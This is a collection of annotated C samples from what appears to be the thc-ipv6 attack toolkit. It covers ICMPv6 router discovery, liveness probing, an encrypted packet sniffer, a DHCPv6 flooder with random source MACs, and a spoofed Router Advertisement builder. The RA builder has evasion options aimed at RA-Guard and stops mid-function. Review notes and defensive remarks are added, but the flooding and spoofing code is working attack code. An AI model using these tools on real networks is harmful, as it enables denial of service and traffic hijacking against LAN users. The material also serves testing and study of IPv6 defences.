Esempio n. 1
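/*
 * Router discovery helper: sends a single ICMPv6 Router Solicitation and
 * passes every captured ICMPv6 packet to dump_ra_reply() until the 5 second
 * alarm installed below triggers clean_exit().
 *
 * Command line as parsed here: [-r] interface [target]
 *   -r       switch the thc-ipv6 library into raw mode
 *   target   destination to solicit; defaults to ff02::2
 *
 * help(), seen, dump_ra_reply() and clean_exit() are defined elsewhere in the
 * file.
 */
int main(int argc, char *argv[]) {
    char *interface, string[] = "ip6 and icmp6";
    unsigned char *mac6, buf[512];
    unsigned char *dst = thc_resolve6("ff02::2");
    int i;
    unsigned char *pkt = NULL;
    int pkt_len = 0;
    pcap_t *p;

    if (argc < 2 || strncmp(argv[1], "-h", 2) == 0)
        help(argv[0]);

    while ((i = getopt(argc, argv, "r")) >= 0) {
        switch (i) {
        case 'r':
            thc_ipv6_rawmode(1);
            break;
        default:
            fprintf(stderr, "Error: invalid option %c\n", i);
            exit(-1);
        }
    }

    /* "-r" on its own satisfies the argc check above but leaves no
     * positional argument, so argv[optind] would be the NULL terminator. */
    if (optind >= argc) {
        fprintf(stderr, "Error: no interface specified\n");
        exit(-1);
    }

    interface = argv[optind];
    if ((mac6 = thc_get_own_mac(interface)) == NULL) {
        fprintf(stderr, "Error: invalid interface %s\n", interface);
        exit(-1);
    }
    if (argc - optind > 1 && argv[optind + 1] != NULL)
        dst = thc_resolve6(argv[optind + 1]);
    /* Either the default or the user-supplied target may fail to resolve. */
    if (dst == NULL) {
        fprintf(stderr, "Error: can not resolve target address\n");
        exit(-1);
    }

    /* Option carried in the solicitation: type 1, length 1 (one 8-byte
     * unit), followed by our own 6-byte MAC address. */
    memset(buf, 0, sizeof(buf));
    buf[0] = 1;
    buf[1] = 1;
    memcpy(buf + 2, mac6, 6);
    i = 8;
    memset(seen, 0, sizeof(seen));

    /* Open the capture before sending so that early replies are not missed. */
    if ((p = thc_pcap_init(interface, string)) == NULL) {
        fprintf(stderr, "Error: could not capture on interface %s with string %s\n", interface, string);
        exit(-1);
    }

    if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, NULL, dst, 255, 0, 0, 0xe0, 0)) == NULL)
        return -1;
    if (thc_add_icmp6(pkt, &pkt_len, ICMP6_ROUTERSOL, 0, 0, buf, i, 0) < 0)
        return -1;
    if (thc_generate_and_send_pkt(interface, mac6, NULL, pkt, &pkt_len) < 0)
        return -1;

    /* The polling loop below never ends by itself; SIGALRM after five
     * seconds runs clean_exit(). */
    signal(SIGALRM, clean_exit);
    alarm(5);
    while (1) {
        while (thc_pcap_check(p, (char *) dump_ra_reply, NULL) > 0);
        usleep(100);
    }
    return 0;
}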
Esempio n. 2
/*
 * Liveness probe: pings dst from src on interface and waits for traffic on
 * the capture handle p.
 *
 * Any packet that thc_pcap_check() reports on p counts as an answer, so the
 * accuracy of the result depends on the filter p was opened with. A second
 * ping is sent once more than one second has passed without an answer, and
 * the wait is abandoned once more than four seconds have passed.
 *
 * Returns 1 when an answer was seen, 0 on timeout. The loop polls without
 * sleeping.
 */
int check_alive(pcap_t * p, char *interface, unsigned char *src, unsigned char *dst) {
  /* -2: first ping outstanding, -1: retry sent, 0: timed out, 1: answered */
  int state = -2;
  time_t started;

  /* drain whatever is already queued on the capture handle */
  while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0)
    ;

  thc_ping6(interface, src, dst, 16, 1);
  started = time(NULL);

  do {
    if (thc_pcap_check(p, (char *) ignoreit, NULL) > 0)
      state = 1;

    /* one retry, only while the first ping is still unanswered */
    if (state == -2 && time(NULL) > started + 1) {
      thc_ping6(interface, src, dst, 16, 1);
      state = -1;
    }

    if (state < 0 && time(NULL) > started + 4)
      state = 0;
  } while (state < 0);

  return state > 0;
}
Esempio n. 3
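/*
 * Sends one ICMPv6 Inverse Neighbor Solicitation for the MAC address given
 * in argv[2] to ff02::1 on the interface given in argv[1], then hands the
 * captured ICMPv6 packets to check_packets().
 *
 * Command line: interface mac-address   (mac as xx:xx:xx:xx:xx:xx)
 *
 * help(), mac and check_packets() are defined elsewhere in the file.
 */
int main(int argc, char *argv[]) {
    unsigned char *pkt1 = NULL, buf[24];
    unsigned char *dst6 = NULL, *smac, dstmac[16] = "", *dmac = dstmac;
    unsigned int octet[6];
    int pkt1_len = 0, k;
    char *interface, string[64] = "icmp6";
    pcap_t *p;

    if (argc != 3 || strncmp(argv[1], "-h", 2) == 0)
        help(argv[0]);

    if (getenv("THC_IPV6_PPPOE") != NULL || getenv("THC_IPV6_6IN4") != NULL) printf("WARNING: %s is not working with injection!\n", argv[0]);

    interface = argv[1];

    /* Parse into real unsigned ints and narrow afterwards. Scanning "%x"
     * straight into byte addresses stores sizeof(unsigned int) bytes per
     * field through a misaligned pointer and only yields the right bytes on
     * little-endian hosts. */
    if (sscanf(argv[2], "%x:%x:%x:%x:%x:%x", &octet[0], &octet[1], &octet[2], &octet[3], &octet[4], &octet[5]) != 6) {
        fprintf(stderr, "Error: invalid mac address %s\n", argv[2]);
        exit(-1);
    }
    for (k = 0; k < 6; k++) {
        if (octet[k] > 0xff) {
            fprintf(stderr, "Error: invalid mac address %s\n", argv[2]);
            exit(-1);
        }
        dmac[k] = (unsigned char) octet[k];
    }

    mac = argv[2];
    if ((smac = thc_get_own_mac(interface)) == NULL) {
        fprintf(stderr, "Error: invalid interface %s\n", interface);
        exit(-1);
    }
    if ((dst6 = thc_resolve6("ff02::1")) == NULL) {
        fprintf(stderr, "Error: can not resolve ff02::1\n");
        exit(-1);
    }

    if ((pkt1 = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt1_len, NULL, dst6, 255, 0, 0, 0, 0)) == NULL)
        return -1;

    /* Two 8-byte options: type 1 carries our own MAC, type 2 the MAC being
     * looked up. */
    memset(buf, 0, sizeof(buf));
    buf[0] = 0x01;
    buf[1] = 0x01;
    memcpy(buf + 2, smac, 6);
    buf[8] = 0x02;
    buf[9] = 0x01;
    memcpy(buf + 10, dmac, 6);
    if (thc_add_icmp6(pkt1, &pkt1_len, ICMP6_INVNEIGHBORSOL, 0, 0, (unsigned char *) &buf, 16, 0) < 0)
        return -1;
    if (thc_generate_pkt(interface, smac, dmac, pkt1, &pkt1_len) < 0) {
        fprintf(stderr, "Error: Can not generate packet, exiting ...\n");
        exit(-1);
    }

    if ((p = thc_pcap_init(interface, string)) == NULL) {
        fprintf(stderr, "Error: could not capture on interface %s with string %s\n", interface, string);
        exit(-1);
    }
    /* NOTE(review): this prints argv[1], the interface, not the MAC being
     * looked up - confirm which one was intended. */
    printf("Sending inverse packet for %s\n", argv[1]);
    thc_send_pkt(interface, pkt1, &pkt1_len);
    sleep(1);
    /* The loop ends when thc_pcap_check() returns 0; the "never reached"
     * remark below presumably relies on check_packets() exiting first. */
    while (thc_pcap_check(p, (char *) check_packets, NULL));
    return 0;                     // never reached
}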
Esempio n. 4
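/*
 * Capture loop: opens the output file named on the command line, optionally
 * derives a Blowfish key from the -k passphrase, and then hands every IPv6
 * packet captured on the interface to check_packets().
 *
 * Command line as parsed here: [-r] [-k key] interface file
 *
 * help(), rawmode, key, f, bfkey, hash, vec, num and check_packets() are
 * defined elsewhere in the file; what check_packets() writes to f is not
 * visible in this listing.
 */
int main(int argc, char *argv[]) {
    char *interface;
    pcap_t *p;
    int i;

    if (argc < 3 || strncmp(argv[1], "-h", 2) == 0)
        help(argv[0]);

    while ((i = getopt(argc, argv, "rk:")) >= 0) {
        switch (i) {
        case 'r':
            rawmode = 1;
            thc_ipv6_rawmode(1);
            break;
        case 'k':
            key = optarg;
            break;
        default:
            fprintf(stderr, "Unknown option\n");
            exit(-1);
        }
    }

    /* Options alone can satisfy the argc check above (e.g. "-k x"), which
     * would make argv[optind + 1] index past the NULL terminator. */
    if (argc - optind < 2) {
        fprintf(stderr, "Error: interface and output file are required\n");
        exit(-1);
    }

    interface = argv[optind];
    /* NOTE(review): mode "w" truncates whatever the path names and follows
     * symlinks; packet capture normally needs elevated privileges, so the
     * path should only ever come from the operator. */
    if ((f = fopen(argv[optind + 1], "w")) == NULL) {
        fprintf(stderr, "Error: file %s cout not be created\n", argv[optind + 1]);
        exit(-1);
    }

    if (key != NULL) {
        /* The passphrase is hashed once with SHA-1 (no salt, no iteration)
         * and the digest is used directly as the Blowfish key.
         * NOTE(review): both primitives are legacy and this derivation gives
         * little resistance to offline passphrase guessing.
         * The key length passed is sizeof(hash); assumes hash is declared as
         * exactly the 20-byte digest buffer - TODO confirm. */
        memset(&bfkey, 0, sizeof(bfkey));
        SHA1((unsigned char *) key, strlen(key), (unsigned char *) hash);
        BF_set_key(&bfkey, sizeof(hash), (unsigned char *) hash);
        memset(vec, 0, sizeof(vec));
        num = 0;
    }

    if ((p = thc_pcap_init(interface, "ip6")) == NULL) {
        fprintf(stderr, "Error: could not capture on interface %s\n", interface);
        exit(-1);
    }

    /* Runs until the process is killed; f is never closed here. */
    while (1) {
        thc_pcap_check(p, (char *) check_packets, NULL);
        usleep(50);
    }

    return 0;
}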
Esempio n. 5
/*
 * Sends DHCPv6 Solicit messages (UDP 546 -> 547) in an endless loop, to
 * ff02::1:2 unless a destination is given, and passes captured replies to
 * check_packets().
 *
 * Per iteration the message template is patched with rand() bytes and the
 * running counter. Unless -n / -N is given, the link-layer source and the
 * IPv6 source also change with every packet.
 *
 * Defensive context: with the defaults the traffic looks like a stream of
 * short-lived clients behind one access port, so per-port MAC limits and
 * DHCPv6 request rate limiting are the controls that see it.
 *
 * help(), interface, do_dns, dns_name, solicit, dnsupdate1, dnsupdate2,
 * _TAKE3 and check_packets() are defined elsewhere in the file.
 */
int main(int argc, char *argv[]) {
  char mac[6] = { 0, 0x0c, 0, 0, 0, 0 }, *pkt = NULL;
  char wdatabuf[1024];
  // mac6 aliases the local mac[] array until -n/-N replaces it (char vs unsigned char mismatch)
  unsigned char *mac6 = mac, *src, *dst;
  int i, s, len, pkt_len = 0, dlen = 0;
  unsigned long long int count = 0;
  pcap_t *p = NULL;
  int do_all = 1, use_real_mac = 0, use_real_link = 0;

  if (argc < 2 || strncmp(argv[1], "-h", 2) == 0)
    help(argv[0]);

  if (getenv("THC_IPV6_PPPOE") != NULL || getenv("THC_IPV6_6IN4") != NULL) printf("WARNING: %s is not working with injection!\n", argv[0]);

  while ((i = getopt(argc, argv, "d:nNr1")) >= 0) {
    switch (i) {
    case 'N':
      use_real_link = 1;        // no break
    case 'n':
      use_real_mac = 1;
      break;
    case '1':
      do_all = 0;
      break;
    case 'd':
      do_dns = 1;
      dns_name = optarg;
      break;
    case 'r':
      i = 0;
      break;                    // just to ignore -r
    default:
      fprintf(stderr, "Error: unknown option -%c\n", i);
      exit(-1);
    }
  }

  // NOTE(review): this clears the 0x0c byte from the initializer above
  memset(mac, 0, sizeof(mac));
  // NOTE(review): argv[optind] is the NULL terminator when only options were given; not checked here
  interface = argv[optind];
  if (use_real_link)
    src = thc_get_own_ipv6(interface, NULL, PREFER_LINK);
  else
    src = thc_resolve6("fe80::");
  if (use_real_mac)
    mac6 = thc_get_own_mac(interface);
  if (argc - optind <= 1)
    dst = thc_resolve6("ff02::1:2");
  else
    dst = thc_resolve6(argv[optind + 1]);
  setvbuf(stdout, NULL, _IONBF, 0);
  setvbuf(stderr, NULL, _IONBF, 0);

  // dst is not part of this check, so a destination that fails to resolve goes on as NULL
  if (src == NULL || mac6 == NULL) {
    fprintf(stderr, "Error: invalid interface %s or bad mac/IP defined\n", interface);
    exit(-1);
  }

  // only to prevent our system to send icmp port unreachable messages
  if ((s = thc_bind_udp_port(546)) < 0)
    fprintf(stderr, "Warning: could not bind to 546/udp\n");
  if ((p = thc_pcap_init_promisc(interface, "ip6 and udp and dst port 546")) == NULL) {
    fprintf(stderr, "Error: can not open interface %s in promisc mode\n", interface);
    exit(-1);
  }
  // message template: solicit[], optionally followed by dnsupdate1 + name + dnsupdate2
  // assumes the templates plus a name shorter than 240 bytes fit wdatabuf[1024] - TODO confirm template sizes
  len = sizeof(solicit);
  memcpy(wdatabuf, solicit, len);
  if (do_dns) {
    memcpy(wdatabuf + len, dnsupdate1, sizeof(dnsupdate1));
    // dlen marks a position 8 bytes into dnsupdate1; the bytes at dlen-5 and dlen-3 are
    // grown by the name length below (presumably option length fields - verify against dnsupdate1)
    dlen = len + 8;
    len += sizeof(dnsupdate1);
    if (dns_name != NULL && strlen(dns_name) < 240) {
      if (dns_name[0] != '.') {
        wdatabuf[len] = '.';
        wdatabuf[dlen - 5]++;
        wdatabuf[dlen - 3]++;
        len++;
      }
      // the copy includes the terminating NUL
      memcpy(wdatabuf + len, dns_name, strlen(dns_name) + 1);
      wdatabuf[dlen - 5] += strlen(dns_name) + 1;
      wdatabuf[dlen - 3] += strlen(dns_name) + 1;
      len += strlen(dns_name) + 1;
    }
    memcpy(wdatabuf + len, dnsupdate2, sizeof(dnsupdate2));
    len += sizeof(dnsupdate2);
  }

  printf("Starting to flood dhcp6 servers locally on %s (Press Control-C to end) ...\n\n", interface);
  while (1) {
    count++;
    // without -N the low 8 bytes of the source address buffer are overwritten with the counter
    if (!use_real_link)
      memcpy(src + 8, (char *) &count, 8);
    // start0: 1-3 rand, 18-21 rand, 22-27 mac, 32-35 rand
    // no srand() call is visible in this block, so the rand() sequence repeats per run unless seeded elsewhere
    for (i = 0; i < 3; i++) {
      wdatabuf[i + 32] = rand() % 256;
      wdatabuf[i + 18] = rand() % 256;
      mac[i + 2] = rand() % 256;
      if (do_dns)
        wdatabuf[i + dlen] = 'a' + rand() % 26;
    }
    if (!use_real_mac)
      memcpy(wdatabuf + 22, mac, 6);
    // three bytes of the counter go to offsets 1..3 of the message; _TAKE3 is defined elsewhere
    memcpy(wdatabuf + 1, (char *) &count + _TAKE3, 3);

    if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, src, dst, 1, 0, 0, 0, 0)) == NULL)
      return -1;
    // on this failure path pkt is not destroyed; the process ends right after
    if (thc_add_udp(pkt, &pkt_len, 546, 547, 0, wdatabuf, len) < 0)
      return -1;
    // we have to tone it down, otherwise we will not get advertisements
    if (thc_generate_and_send_pkt(interface, mac6, NULL, pkt, &pkt_len) < 0)
      printf("!");
    pkt = thc_destroy_packet(pkt);
    // with -1 (do_all == 0) replies are never read and there is no pause between packets
    if (do_all) {
      usleep(75);
      while (thc_pcap_check(p, (char *) check_packets, NULL) > 0);
    }
    if (count % 1000 == 0)
      printf(".");
  }

  return 0;                     // never reached
}
Esempio n. 6
/*
 * Builds one ICMPv6 Router Advertisement from the command-line options and
 * sends it to_send times (without limit when to_send > 255), sleeping
 * `interval` seconds between transmissions. After each send, captured
 * packets matching "ip6 and icmp6 and dst ff02::2" are handed to
 * send_rs_reply().
 *
 * The RA body is assembled by hand in buf[]: reachable and retransmit
 * timers first, then the MTU, source link-layer address, prefix, route,
 * DNS server and DNS search list options, in that order.
 *
 * Defensive context: RAs arriving on host-facing switch ports are what
 * RA-Guard (RFC 6105) filters; the extension-header and fragment variants
 * selected with -E are the cases RFC 7113 and RFC 6980 address.
 *
 * Review notes on this block are limited to input handling and memory
 * safety of the tool itself.
 *
 * help(), interval, to_send, plife, rlife, dlife, llife, reach, trans, prio,
 * flags, do_overlap, do_frag, do_hop, do_dst, do_hdr_size, myoff, type, cnt,
 * buf3, the fr* variables, MAX_ENTRIES and send_rs_reply() are defined
 * elsewhere in the file.
 */
int main(int argc, char *argv[]) {
  char *interface, mac[16] = "", dmac[16] = "";
  unsigned char *routerip6, *mac6 = NULL, *ip6 = NULL;
  unsigned char buf[512], *ptr, buf2[6], string[] = "ip6 and icmp6 and dst ff02::2";
  // rbuf (routes) and pbuf (prefixes): one row per entry, byte 0 = prefix length, bytes 1..16 = address
  unsigned char rbuf[MAX_ENTRIES + 1][17], pbuf[MAX_ENTRIES + 1][17], *dbuf[MAX_ENTRIES + 1];
  unsigned char *dst = thc_resolve6("ff02::1");
  unsigned char *dstmac = thc_get_multicast_mac(dst);
  int size, mtu = 0, i, j, k, l, m, n, rcnt = 0, pcnt = 0, dcnt = 0, sent = 0;
  unsigned char *pkt = NULL, *searchlist = NULL;
  int pkt_len = 0;
  pcap_t *p;

  if (argc < 2 || strncmp(argv[1], "-h", 2) == 0)
    help(argv[0]);

  memset(rbuf, 0, sizeof(rbuf));
  memset(mac, 0, sizeof(mac));

  // numeric options below go through atoi(), so non-numeric input silently becomes 0
  // "r:" appears twice in the option string
  while ((i = getopt(argc, argv, "i:r:E:R:M:m:S:s:D:L:A:a:r:d:t:T:p:n:l:F:")) >= 0) {
    switch (i) {
    case 'i':
      interval = atoi(optarg);
      break;
    case 'm':
      // NOTE(review): each %x stores sizeof(unsigned int) bytes at a byte offset of dmac.
      // The writes stay inside dmac[16], but the result is only right on little-endian hosts,
      // the pointer is misaligned, and the sscanf() return value is not checked.
      sscanf(optarg, "%x:%x:%x:%x:%x:%x", (unsigned int *) &dmac[0], (unsigned int *) &dmac[1], (unsigned int *) &dmac[2], (unsigned int *) &dmac[3], (unsigned int *) &dmac[4],
             (unsigned int *) &dmac[5]);
      dstmac = dmac;
      break;
    case 'S':
      // same parsing pattern and caveats as -m above, into mac[16]
      sscanf(optarg, "%x:%x:%x:%x:%x:%x", (unsigned int *) &mac[0], (unsigned int *) &mac[1], (unsigned int *) &mac[2], (unsigned int *) &mac[3], (unsigned int *) &mac[4],
             (unsigned int *) &mac[5]);
      mac6 = mac;
      break;
    case 's':
      if ((ip6 = thc_resolve6(optarg)) == NULL) {
        fprintf(stderr, "Error: can not resolve source ip address %s\n", optarg);
        exit(-1);
      }
      break;
    case 'M':
      mtu = atoi(optarg);
      if (mtu < 0 || mtu > 65535) {
        fprintf(stderr, "Error: mtu argument is invalid: %s\n", optarg);
        exit(-1);
      }
      if (mtu < 1228 || mtu > 1500)
        fprintf(stderr, "Warning: unusual mtu size defined, be sure what you are doing: %d\n", mtu);
      break;
    case 'n':
      to_send = atoi(optarg);
      // NOTE(review): the upper bound tests mtu, not to_send, so the limit of 255 named in the message is not enforced
      if (to_send < 1 || mtu > 255) {
        fprintf(stderr, "Error: -n argument is invalid, must be between 1 and 255: %s\n", optarg);
        exit(-1);
      }
      break;
    case 'A':
      if (pcnt >= MAX_ENTRIES) {
        fprintf(stderr, "Error: you can not define more than %d autoconfig addresses\n", MAX_ENTRIES);
        exit(-1);
      }
      // NOTE(review): when optarg is NULL this still passes it to %s
      if (optarg == NULL || (ptr = index(optarg, '/')) == NULL) {
        fprintf(stderr, "Error: -A option must be supplied as IP-ADDRESS/PREFIXLENGTH, e.g. fd00::/64 : %s\n", optarg);
        exit(-1);
      }
      // split "address/length" in place
      *ptr++ = 0;
      // "< 0 && > 255" can never both hold, so no prefix length is rejected here
      if ((size = atoi(ptr)) < 0 && size > 255) {       // yes we allow bad sizes :-)
        fprintf(stderr, "Error: -A option prefix length must be between 0 and 128: %s\n", optarg);
        exit(-1);
      }
      if (size != 64)
        fprintf(stderr, "Warning: -A option defines an unusual prefix length: %d\n", size);
      // NOTE(review): strcat() appends to the argv string itself; how much room follows
      // the address part depends on the length of the "/length" suffix that was cut off
      if (index(optarg, ':') == NULL)
        strcat(optarg, "::");
      if ((routerip6 = thc_resolve6(optarg)) == NULL) {
        fprintf(stderr, "Error: -A option network is invalid: %s\n", optarg);
        exit(-1);
      }
      pbuf[pcnt][0] = size % 256;
      memcpy((char *) &pbuf[pcnt][1], routerip6, 16);
      pcnt++;
      break;
    case 'a':
      plife = atoi(optarg);
      break;
    case 'r':
      rlife = atoi(optarg);
      break;
    case 'd':
      dlife = atoi(optarg);
      break;
    case 'l':
      llife = atoi(optarg);
      break;
    case 'T':
      reach = atoi(optarg);
      break;
    case 't':
      trans = atoi(optarg);
      break;
    case 'p':
      // prefix match only: "low...", "med...", "hi...", "res..."; "res" is accepted but not named in the error text
      if (strncasecmp(optarg, "low", 3) == 0)
        prio = 0;
      else
        if (strncasecmp(optarg, "med", 3) == 0)
          prio = 1;
        else
          if (strncasecmp(optarg, "hi", 2) == 0)
            prio = 2;
          else
            if (strncasecmp(optarg, "res", 3) == 0)
              prio = 3;
            else {
              fprintf(stderr, "Error: unknown priority, known keywords are low, medium and high: %s\n", optarg);
              exit(-1);
            }
      break;
    case 'R':
      // same parsing as -A, with the same caveats (NULL optarg in %s, ineffective range check, strcat on argv)
      if (rcnt >= MAX_ENTRIES) {
        fprintf(stderr, "Error: you can not define more than %d routes\n", MAX_ENTRIES);
        exit(-1);
      }
      if (optarg == NULL || (ptr = index(optarg, '/')) == NULL) {
        fprintf(stderr, "Error: -R option must be supplied as IP-ADDRESS/PREFIXLENGTH, e.g. fd00::/64 : %s\n", optarg);
        exit(-1);
      }
      *ptr++ = 0;
      if ((size = atoi(ptr)) < 0 && size > 255) {       // yes we allow bad sizes :-)
        fprintf(stderr, "Error: -R option prefix length must be between 0 and 128: %s\n", optarg);
        exit(-1);
      }
      if (index(optarg, ':') == NULL)
        strcat(optarg, "::");
      if ((routerip6 = thc_resolve6(optarg)) == NULL) {
        fprintf(stderr, "Error: -R option network is invalid: %s\n", optarg);
        exit(-1);
      }
      rbuf[rcnt][0] = size % 256;
      memcpy((char *) &rbuf[rcnt][1], routerip6, 16);
      rcnt++;
      break;
    case 'D':
      if (dcnt >= MAX_ENTRIES) {
        fprintf(stderr, "Error: you can not define more than %d DNS servers\n", MAX_ENTRIES);
        exit(-1);
      }
      // dcnt is incremented before the NULL test; the failure path exits, so the slot is never used
      if ((dbuf[dcnt++] = thc_resolve6(optarg)) == NULL) {
        fprintf(stderr, "Error: can not resolve DNS server %s\n", optarg);
        exit(-1);
      }
      break;
    case 'L':
      // kept as a pointer into argv; the search list encoder below edits this string in place
      searchlist = optarg;
      break;
    case 'E':
      if (optarg == NULL) {
        fprintf(stderr, "Error: no option type given for -E\n");
        exit(-1);
      }
      // one character per requested variant; the combination check runs after every character
      for (j = 0; j < strlen(optarg); j++) {
        switch (optarg[j]) {    // fall through to be fail safe on accidental misuse
        case '0':              // fall through
        case 'O':
          do_overlap = 1;
          break;
        case 'o':
          do_overlap = 2;
          break;
        case '1':              // fall through
        case 'l':              // fall through
        case 'L':
          do_frag++;
          break;
        case 'h':              // fall through
        case 'H':
          do_hop = 1;
          break;
        case 'd':              // fall through
        case 'D':
          do_dst = 1;
          break;
        default:
          fprintf(stderr, "Error: unknown evasion type %c!\n", optarg[j]);
          exit(-1);
        }
        if ((do_frag && (do_dst || do_overlap)) || (do_dst && do_overlap)) {
          fprintf(stderr, "Error: you can not use -E types 1, D, O and o together!\n");
          exit(-1);
        }
      }
      break;
    case 'F':
        // comma separated flag names, matched by prefix; strtok() modifies optarg in place
        ptr = strtok(optarg, ",");
        while (ptr != NULL) {
          if (strncasecmp(ptr, "man", 3) == 0)
            flags = (flags | 128);
          else if (strncasecmp(ptr, "oth", 3) == 0)
            flags = (flags | 64);
          else if (strncasecmp(ptr, "hom", 3) == 0)
            flags = (flags | 32);
          else if (strncasecmp(ptr, "prox", 4) == 0)
            flags = (flags | 4);
          else if (strncasecmp(ptr, "res", 3) == 0)
            flags = (flags | 2);
          else if (strncasecmp(ptr, "unk", 3) == 0)
            flags = (flags | 1);
          else {
            fprintf(stderr, "Error: unknown flag: %s\n", ptr);
            exit(-1);
          }
          ptr = strtok(NULL, ",");
        }
      break;
    default:
      fprintf(stderr, "Error: invalid option %c\n", i);
      exit(-1);
    }
  }

  // exactly one or two positional arguments: interface [target]
  if ((argc - optind) < 1 || (argc - optind) > 2)
    help(argv[0]);

  if (do_hdr_size)
    myoff = do_hdr_size;
  interface = argv[optind];
  if (argc - optind == 2)
    if ((dst = thc_resolve6(argv[optind + 1])) == NULL) {
      fprintf(stderr, "Error: invalid target %s\n", argv[optind + 1]);
      exit(-1);
    }
  if (mtu == 0)
    mtu = thc_get_mtu(interface);
  if (mac6 == NULL)
    if ((mac6 = thc_get_own_mac(interface)) == NULL) {
      fprintf(stderr, "Error: invalid interface %s\n", interface);
      exit(-1);
    }
  if (ip6 == NULL)
    if ((ip6 = thc_get_own_ipv6(interface, NULL, PREFER_LINK)) == NULL) {
      fprintf(stderr, "Error: IPv6 is not enabled on interface %s\n", interface);
      exit(-1);
    }
//  if (dns == NULL)
//    dns = thc_resolve6("ff02::fb");

  // publish the locals through file-scope variables (presumably read by send_rs_reply - verify)
  frint = interface;
  frip6 = ip6;
  frmac = mac6;
  frbuf = buf;
  frbuf2 = buf2;
  frbuf2len = sizeof(buf2);

  memset(buf, 0, sizeof(buf));
  memset(buf2, 0, sizeof(buf2));
  memset(buf3, 0, sizeof(buf3));

  // llife is capped to 16 bits, its top byte is set to 0xff, and bits of the 0x00ff0000 byte
  // are set from prio and flags; the combined word is the fifth argument of thc_add_icmp6() below.
  // NOTE(review): presumably this lays out hop limit, flags and router lifetime of the RA header - confirm
  if (llife > 0xffff)
    llife = 0xffff;
  llife = (llife | 0xff000000);
  if (prio == 2)
    llife = (llife | 0x00080000);
  else if (prio == 0)
    llife = (llife | 0x00180000);
  else if (prio != 1)
    llife = (llife | 0x00100000);
  
  llife = (llife | (flags << 16));

  // reach and trans, four bytes each, most significant byte first
  buf[0] = reach / 16777216;
  buf[1] = (reach % 16777216) / 65536;
  buf[2] = (reach % 65536) / 256;
  buf[3] = reach % 256;
  buf[4] = trans / 16777216;
  buf[5] = (trans % 16777216) / 65536;
  buf[6] = (trans % 65536) / 256;
  buf[7] = trans % 256;

  // option mtu
  // type 5, length 1 (8 bytes); bytes 10 and 11 stay zero from the memset above
  buf[8] = 5;
  buf[9] = 1;
  buf[12] = mtu / 16777216;
  buf[13] = (mtu % 16777216) / 65536;
  buf[14] = (mtu % 65536) / 256;
  buf[15] = mtu % 256;
  i = 16;

  // NOTE(review): from here on i grows by 8 for the MAC option, 32 per prefix, 24 per route and
  // 24 per DNS server, plus the search list, and is never compared with sizeof(buf) (512).
  // Whether that can overflow depends on MAX_ENTRIES and the -L length.

  // mac address option
  buf[i++] = 1;
  buf[i++] = 1;
  memcpy(buf + i, mac6, 6);
  i += 6;

  // option prefix, put all in
  // type 3, length 4 (32 bytes); valid lifetime = plife, preferred lifetime = plife / 2
  if (pcnt > 0)
    for (j = 0; j < pcnt; j++) {
      buf[i++] = 3;
      buf[i++] = 4;
      buf[i++] = pbuf[j][0];    // prefix length
      // 128 + 64: presumably the on-link and autonomous flags of the prefix option
      buf[i++] = 128 + 64;
      buf[i++] = plife / 16777216;
      buf[i++] = (plife % 16777216) / 65536;
      buf[i++] = (plife % 65536) / 256;
      buf[i++] = plife % 256;
      buf[i++] = (plife / 2) / 16777216;
      buf[i++] = ((plife / 2) % 16777216) / 65536;
      buf[i++] = ((plife / 2) % 65536) / 256;
      buf[i++] = (plife / 2) % 256;
      i += 4;                   // + 4 bytes reserved
      memcpy(&buf[i], (char *) &pbuf[j][1], 16);
      i += 16;
    }
  // route option, put all in
  if (rcnt > 0)
    for (j = 0; j < rcnt; j++) {
      buf[i++] = 0x18;          // routing entry option type
      buf[i++] = 0x03;          // length 3 == 24 bytes
      buf[i++] = rbuf[j][0];    // prefix length
      if (prio == 2)
        buf[i++] = 0x08;          // priority, highest of course
      else if (prio == 1)
        buf[i++] = 0x00;
      else if (prio == 0)
        buf[i++] = 0x18;
      else
        // NOTE(review): "==" compares instead of assigning; the byte keeps the 0 from the memset, i still advances
        buf[i++] == 0x10;
      buf[i++] = rlife / 16777216;
      buf[i++] = (rlife % 16777216) / 65536;
      buf[i++] = (rlife % 65536) / 256;
      buf[i++] = rlife % 256;
      memcpy((char *) &buf[i], (char *) &rbuf[j][1], 16);       // network
      i += 16;
    }
  // dns option
  // one option per server: type 0x19, length 3 (24 bytes), lifetime dlife
  if (dcnt > 0)
    for (j = 0; j < dcnt; j++) {
      buf[i++] = 0x19;          // dns option type
      buf[i++] = 0x03;          // length
      i += 2;                   // reserved
      buf[i++] = dlife / 16777216;
      buf[i++] = (dlife % 16777216) / 65536;
      buf[i++] = (dlife % 65536) / 256;
      buf[i++] = dlife % 256;
      memcpy(buf + i, dbuf[j], 16);     // dns server
      i += 16;
    }
    
  // dns searchlist option
  // type 31; the comma separated names from -L are rewritten in place and emitted as
  // length-prefixed labels starting at buf[i + 8], then padded to a multiple of 8 bytes
  if (searchlist != NULL) {
    buf[i] = 31;
    buf[i + 4] = dlife / 16777216;
    buf[i + 5] = (dlife % 16777216) / 65536;
    buf[i + 6] = (dlife % 65536) / 256;
    buf[i + 7] = dlife % 256;
    // NOTE(review): for an empty -L string strlen() is 0 and this indexes searchlist[-1]
    if (searchlist[strlen(searchlist) - 1] == '.')
      searchlist[strlen(searchlist) - 1] = 0;
    m = 0;
    // drop the dot of every ".," by shifting the remainder of the string left by one
    while ((ptr = strstr(searchlist, ".,")) != NULL) {
      m = strlen(ptr);
      for (l = 1; l < m; l++)
        ptr[l - 1] = ptr[l];
      ptr[m - 1] = 0;
    }
    // l: read offset into searchlist, m: bytes written so far, j: total input length
    l = 0;
    m = 0;
    j = strlen(searchlist);
    do {
      // k is set when the next separator is a comma, i.e. the current label ends a name
      k = 0;
      ptr = index(&searchlist[l], '.');
      if (ptr == NULL || (index(&searchlist[l], ',') != NULL && (char*)ptr > (char*)index(&searchlist[l], ','))) {
        k = 1;
        ptr = index(&searchlist[l], ',');
      }
      if (ptr != NULL)
        *ptr = 0;
      n = strlen(&searchlist[l]);

      // NOTE(review): n is stored in a single byte and neither n nor m is bounded against buf
      buf[i + 8 + m] = n;
      memcpy(&buf[i + 8 + m + 1], &searchlist[l], n);

      if (ptr == NULL)
        l = j;
      else
        l += 1 + n;

      m += 1 + n;

      if (k || ptr == NULL)
        m++; // end of domain entry
    } while (l < j && ptr != NULL);
    if (m % 8 > 0)
      m = ( (m / 8) + 1 ) * 8;
    // option length in 8-byte units: padded names plus the 8-byte option header
